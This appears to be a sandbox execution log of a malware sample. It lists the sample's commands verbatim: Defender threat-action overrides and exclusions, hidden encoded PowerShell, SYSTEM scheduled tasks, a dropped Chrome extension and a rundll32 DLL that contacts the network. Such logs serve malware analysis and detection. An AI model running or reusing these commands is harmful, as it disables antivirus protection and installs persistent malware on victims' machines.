- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3456
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:876
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CYZcjjLrQSSSC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CYZcjjLrQSSSC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUXfJBljbcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUXfJBljbcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MaCEdJmjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MaCEdJmjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWTlFEDWyZjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWTlFEDWyZjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hDwfgHvtnjxOxeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hDwfgHvtnjxOxeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QpEhKTiRofuFzpEd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QpEhKTiRofuFzpEd\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:323⤵PID:3024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:324⤵PID:5044
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:323⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:643⤵PID:3916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:323⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:643⤵PID:3360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:323⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:643⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:323⤵PID:4608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:643⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hDwfgHvtnjxOxeVB /t REG_DWORD /d 0 /reg:323⤵PID:4880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hDwfgHvtnjxOxeVB /t REG_DWORD /d 0 /reg:643⤵PID:4668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe /t REG_DWORD /d 0 /reg:323⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe /t REG_DWORD /d 0 /reg:643⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QpEhKTiRofuFzpEd /t REG_DWORD /d 0 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QpEhKTiRofuFzpEd /t REG_DWORD /d 0 /reg:643⤵PID:196
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRuVttjvw" /SC once /ST 01:44:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:1548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRuVttjvw"2⤵PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRuVttjvw"2⤵PID:1704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:58:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\DsRWDpX.exe\" aK /zXTUdidJt 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LTdmnWMddFrWELagp"2⤵PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 7882⤵
- Program crash
PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1900
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3704
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:520
-
C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\DsRWDpX.exeC:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\DsRWDpX.exe aK /zXTUdidJt 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2772 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbMwfSaEkvrmTtNtmp"2⤵PID:876
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2684
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2172
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MaCEdJmjU\qNkQJd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dZgNXlBFHKJPYkR" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dZgNXlBFHKJPYkR2" /F /xml "C:\Program Files (x86)\MaCEdJmjU\ArJOBdp.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dZgNXlBFHKJPYkR"2⤵PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dZgNXlBFHKJPYkR"2⤵PID:2708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RnVvAZaQEByRQe" /F /xml "C:\Program Files (x86)\zWTlFEDWyZjU2\uibKerK.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxpvtvpljnCBk2" /F /xml "C:\ProgramData\hDwfgHvtnjxOxeVB\cQbmdFU.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dfBKvmetieHVblCDx2" /F /xml "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\QBGxwHw.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UKqBjuPeLLAHSylBWrg2" /F /xml "C:\Program Files (x86)\CYZcjjLrQSSSC\DgPWowJ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrUPsTjgSYBWMUseO" /SC once /ST 04:35:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QpEhKTiRofuFzpEd\ynCOYjAT\IFZNDrP.dll\",#1 /nCDldidMTt 525403" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrUPsTjgSYBWMUseO"2⤵PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LTdmnWMddFrWELagp"2⤵PID:3292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 21562⤵
- Program crash
PID:5108
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\ynCOYjAT\IFZNDrP.dll",#1 /nCDldidMTt 5254031⤵PID:208
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\ynCOYjAT\IFZNDrP.dll",#1 /nCDldidMTt 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
